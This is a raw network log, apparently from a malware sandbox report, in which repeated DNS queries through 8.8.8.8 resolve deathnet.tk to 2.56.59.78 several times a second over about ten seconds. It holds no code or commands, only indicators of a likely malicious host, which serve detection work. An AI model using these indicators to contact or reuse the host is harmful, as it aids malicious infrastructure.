              Mar 21, 2022 20:08:59.015296936 CET8.8.8.8192.168.2.230x1e06No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.059958935 CET8.8.8.8192.168.2.230xdcaeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.104711056 CET8.8.8.8192.168.2.230xdf85No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.149537086 CET8.8.8.8192.168.2.230xa357No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.194839954 CET8.8.8.8192.168.2.230x54f7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.243737936 CET8.8.8.8192.168.2.230x4227No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.287179947 CET8.8.8.8192.168.2.230xcfdbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.332175016 CET8.8.8.8192.168.2.230x6982No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.377360106 CET8.8.8.8192.168.2.230x100cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.421861887 CET8.8.8.8192.168.2.230x14fcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.467756987 CET8.8.8.8192.168.2.230x4b76No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.511357069 CET8.8.8.8192.168.2.230xc8ffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.558049917 CET8.8.8.8192.168.2.230xf81eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.608549118 CET8.8.8.8192.168.2.230x250No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.656415939 CET8.8.8.8192.168.2.230x6c01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.699541092 CET8.8.8.8192.168.2.230x60feNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.746618986 CET8.8.8.8192.168.2.230x154No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.793087006 CET8.8.8.8192.168.2.230x1f69No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.842336893 CET8.8.8.8192.168.2.230x9ca5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.888628960 CET8.8.8.8192.168.2.230x73f7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.934269905 CET8.8.8.8192.168.2.230xf188No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.979386091 CET8.8.8.8192.168.2.230xa18eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.022300959 CET8.8.8.8192.168.2.230x39c0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.068365097 CET8.8.8.8192.168.2.230x83c0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.113353968 CET8.8.8.8192.168.2.230xe0a0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.158762932 CET8.8.8.8192.168.2.230x6a7cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.206525087 CET8.8.8.8192.168.2.230x748fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.251379013 CET8.8.8.8192.168.2.230x78e6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.297158003 CET8.8.8.8192.168.2.230xa03fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.343889952 CET8.8.8.8192.168.2.230x6dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.388463974 CET8.8.8.8192.168.2.230x3e2fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.434046984 CET8.8.8.8192.168.2.230x7c8dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.479558945 CET8.8.8.8192.168.2.230x9ebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.522371054 CET8.8.8.8192.168.2.230x7ceaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.571830988 CET8.8.8.8192.168.2.230x177eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.618891954 CET8.8.8.8192.168.2.230x801bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.666137934 CET8.8.8.8192.168.2.230x73aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.710932016 CET8.8.8.8192.168.2.230x5464No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.754069090 CET8.8.8.8192.168.2.230xd503No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.807666063 CET8.8.8.8192.168.2.230xb683No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.850147009 CET8.8.8.8192.168.2.230xa386No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.893680096 CET8.8.8.8192.168.2.230x999cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.938673973 CET8.8.8.8192.168.2.230x4045No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.983006001 CET8.8.8.8192.168.2.230x7b94No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.027791023 CET8.8.8.8192.168.2.230xc21cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.072767019 CET8.8.8.8192.168.2.230xbc3bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.117770910 CET8.8.8.8192.168.2.230x9722No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.162590981 CET8.8.8.8192.168.2.230x6611No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.207802057 CET8.8.8.8192.168.2.230xed7cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.253370047 CET8.8.8.8192.168.2.230xb078No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.295950890 CET8.8.8.8192.168.2.230x6ca2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.340987921 CET8.8.8.8192.168.2.230xd29No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.385864019 CET8.8.8.8192.168.2.230x2c41No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.428530931 CET8.8.8.8192.168.2.230xcd97No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.473346949 CET8.8.8.8192.168.2.230x8150No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.519751072 CET8.8.8.8192.168.2.230xf9b4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.564642906 CET8.8.8.8192.168.2.230xaebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.612307072 CET8.8.8.8192.168.2.230x71b9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.659683943 CET8.8.8.8192.168.2.230xf66No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.705221891 CET8.8.8.8192.168.2.230xdfa9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.751388073 CET8.8.8.8192.168.2.230x34d8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.794881105 CET8.8.8.8192.168.2.230x7c16No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.841984987 CET8.8.8.8192.168.2.230xe7b3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.887017965 CET8.8.8.8192.168.2.230xd08bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.929589033 CET8.8.8.8192.168.2.230x3d0aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.976423979 CET8.8.8.8192.168.2.230x4598No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.021660089 CET8.8.8.8192.168.2.230x39f6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.066323042 CET8.8.8.8192.168.2.230xb5e6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.112696886 CET8.8.8.8192.168.2.230x8852No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.156439066 CET8.8.8.8192.168.2.230x4b6bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.202250004 CET8.8.8.8192.168.2.230xf069No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.247404099 CET8.8.8.8192.168.2.230x36d5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.296555996 CET8.8.8.8192.168.2.230x2ecdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.341722965 CET8.8.8.8192.168.2.230xc54cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.386955976 CET8.8.8.8192.168.2.230xede8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.432738066 CET8.8.8.8192.168.2.230xa6b1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.478800058 CET8.8.8.8192.168.2.230x6c92No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.523855925 CET8.8.8.8192.168.2.230xc804No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.567224026 CET8.8.8.8192.168.2.230xda11No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.611686945 CET8.8.8.8192.168.2.230xf116No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.655976057 CET8.8.8.8192.168.2.230xae56No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.703167915 CET8.8.8.8192.168.2.230x6a56No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.754709959 CET8.8.8.8192.168.2.230xd33cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.800491095 CET8.8.8.8192.168.2.230x49afNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.846602917 CET8.8.8.8192.168.2.230x4952No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.892399073 CET8.8.8.8192.168.2.230x5812No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.935180902 CET8.8.8.8192.168.2.230x3af7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.980592966 CET8.8.8.8192.168.2.230x5f55No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.027864933 CET8.8.8.8192.168.2.230xdce2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.072108030 CET8.8.8.8192.168.2.230x1d46No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.119131088 CET8.8.8.8192.168.2.230xf465No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.166621923 CET8.8.8.8192.168.2.230xae58No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.212295055 CET8.8.8.8192.168.2.230x66d5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.259325027 CET8.8.8.8192.168.2.230x6d0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.304610014 CET8.8.8.8192.168.2.230x715eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.351085901 CET8.8.8.8192.168.2.230x819aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.394503117 CET8.8.8.8192.168.2.230xe9b0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.440752983 CET8.8.8.8192.168.2.230xf6bfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.486488104 CET8.8.8.8192.168.2.230x8623No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.542916059 CET8.8.8.8192.168.2.230x6f9eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.585897923 CET8.8.8.8192.168.2.230x4919No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.631014109 CET8.8.8.8192.168.2.230xe528No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.676188946 CET8.8.8.8192.168.2.230xdcfbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.719341040 CET8.8.8.8192.168.2.230xf9a4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.765134096 CET8.8.8.8192.168.2.230x9189No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.809633017 CET8.8.8.8192.168.2.230x3974No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.855237007 CET8.8.8.8192.168.2.230xdd60No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.901973009 CET8.8.8.8192.168.2.230xc5a4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.949632883 CET8.8.8.8192.168.2.230xa36aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.996028900 CET8.8.8.8192.168.2.230x561cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.043608904 CET8.8.8.8192.168.2.230xd8b4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.086451054 CET8.8.8.8192.168.2.230x561eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.131043911 CET8.8.8.8192.168.2.230x662cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.177356005 CET8.8.8.8192.168.2.230x1f3eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.223229885 CET8.8.8.8192.168.2.230x2d93No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.266213894 CET8.8.8.8192.168.2.230x97fbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.311108112 CET8.8.8.8192.168.2.230x43abNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.355974913 CET8.8.8.8192.168.2.230xddafNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.402019978 CET8.8.8.8192.168.2.230xd5c7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.448663950 CET8.8.8.8192.168.2.230x9fbbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.491116047 CET8.8.8.8192.168.2.230x324fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.536741018 CET8.8.8.8192.168.2.230xdbceNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.579365015 CET8.8.8.8192.168.2.230xea3dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.624460936 CET8.8.8.8192.168.2.230xadd9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.667889118 CET8.8.8.8192.168.2.230x8cfeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.713929892 CET8.8.8.8192.168.2.230x14b3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.759408951 CET8.8.8.8192.168.2.230x414cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.804286957 CET8.8.8.8192.168.2.230x8d0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.855880976 CET8.8.8.8192.168.2.230xd6bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.900360107 CET8.8.8.8192.168.2.230xbfb6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.945197105 CET8.8.8.8192.168.2.230xdb28No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:04.990036011 CET8.8.8.8192.168.2.230xbfb1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.032782078 CET8.8.8.8192.168.2.230x7ffdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.077536106 CET8.8.8.8192.168.2.230xe5cbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.122663975 CET8.8.8.8192.168.2.230xe576No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.170238972 CET8.8.8.8192.168.2.230xb4d0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.212800026 CET8.8.8.8192.168.2.230xdf01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.256103039 CET8.8.8.8192.168.2.230x4690No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.340157032 CET8.8.8.8192.168.2.230xc22bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.385087967 CET8.8.8.8192.168.2.230xdc4bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.429342031 CET8.8.8.8192.168.2.230x2095No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.472465038 CET8.8.8.8192.168.2.230x77b5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.517319918 CET8.8.8.8192.168.2.230x9409No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.560302973 CET8.8.8.8192.168.2.230x53fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.602957010 CET8.8.8.8192.168.2.230x8c1dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.677335024 CET8.8.8.8192.168.2.230x8287No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.730329990 CET8.8.8.8192.168.2.230xe6bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.775298119 CET8.8.8.8192.168.2.230x778fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.822042942 CET8.8.8.8192.168.2.230xb234No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.866508007 CET8.8.8.8192.168.2.230xcb6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.920805931 CET8.8.8.8192.168.2.230xadd9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:05.965642929 CET8.8.8.8192.168.2.230x4594No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:06.093657970 CET8.8.8.8192.168.2.230x828bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.150659084 CET8.8.8.8192.168.2.230xd4bcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.200047016 CET8.8.8.8192.168.2.230x2fefNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.243463993 CET8.8.8.8192.168.2.230x4f02No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.290618896 CET8.8.8.8192.168.2.230xf574No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.337965965 CET8.8.8.8192.168.2.230x35a8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.383497953 CET8.8.8.8192.168.2.230xf610No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.427561998 CET8.8.8.8192.168.2.230xeac2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.471684933 CET8.8.8.8192.168.2.230x340bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.518470049 CET8.8.8.8192.168.2.230x5064No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.564933062 CET8.8.8.8192.168.2.230x752bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.616755009 CET8.8.8.8192.168.2.230xf94dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.660738945 CET8.8.8.8192.168.2.230x65b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.706481934 CET8.8.8.8192.168.2.230x4cd3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.752840042 CET8.8.8.8192.168.2.230x740No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.799145937 CET8.8.8.8192.168.2.230xfe32No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.843704939 CET8.8.8.8192.168.2.230xcaadNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.888844967 CET8.8.8.8192.168.2.230xce6aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.934767962 CET8.8.8.8192.168.2.230x3576No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:07.980195999 CET8.8.8.8192.168.2.230xdcfaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.025644064 CET8.8.8.8192.168.2.230xbb3dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.073031902 CET8.8.8.8192.168.2.230xea1cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.119093895 CET8.8.8.8192.168.2.230xc864No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.165280104 CET8.8.8.8192.168.2.230xd75bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.219716072 CET8.8.8.8192.168.2.230xdbd9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.264925957 CET8.8.8.8192.168.2.230x8b74No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.308808088 CET8.8.8.8192.168.2.230xf65dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.386512041 CET8.8.8.8192.168.2.230xe0e9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.476243973 CET8.8.8.8192.168.2.230x8e0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.520725012 CET8.8.8.8192.168.2.230xf39eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.569338083 CET8.8.8.8192.168.2.230x1306No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.615092039 CET8.8.8.8192.168.2.230xcf4fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.671330929 CET8.8.8.8192.168.2.230x4ad3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.716417074 CET8.8.8.8192.168.2.230x3574No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.761017084 CET8.8.8.8192.168.2.230x30afNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.804085016 CET8.8.8.8192.168.2.230x4f45No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.846400023 CET8.8.8.8192.168.2.230x23c6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.888600111 CET8.8.8.8192.168.2.230x39deNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.932261944 CET8.8.8.8192.168.2.230xb48eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:08.976960897 CET8.8.8.8192.168.2.230x4cd6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.021636963 CET8.8.8.8192.168.2.230x8df6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.069412947 CET8.8.8.8192.168.2.230x47abNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.115634918 CET8.8.8.8192.168.2.230x405No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.165009975 CET8.8.8.8192.168.2.230xea60No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.209323883 CET8.8.8.8192.168.2.230x3085No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.253449917 CET8.8.8.8192.168.2.230x1d1cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:09.298039913 CET8.8.8.8192.168.2.230xc788No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
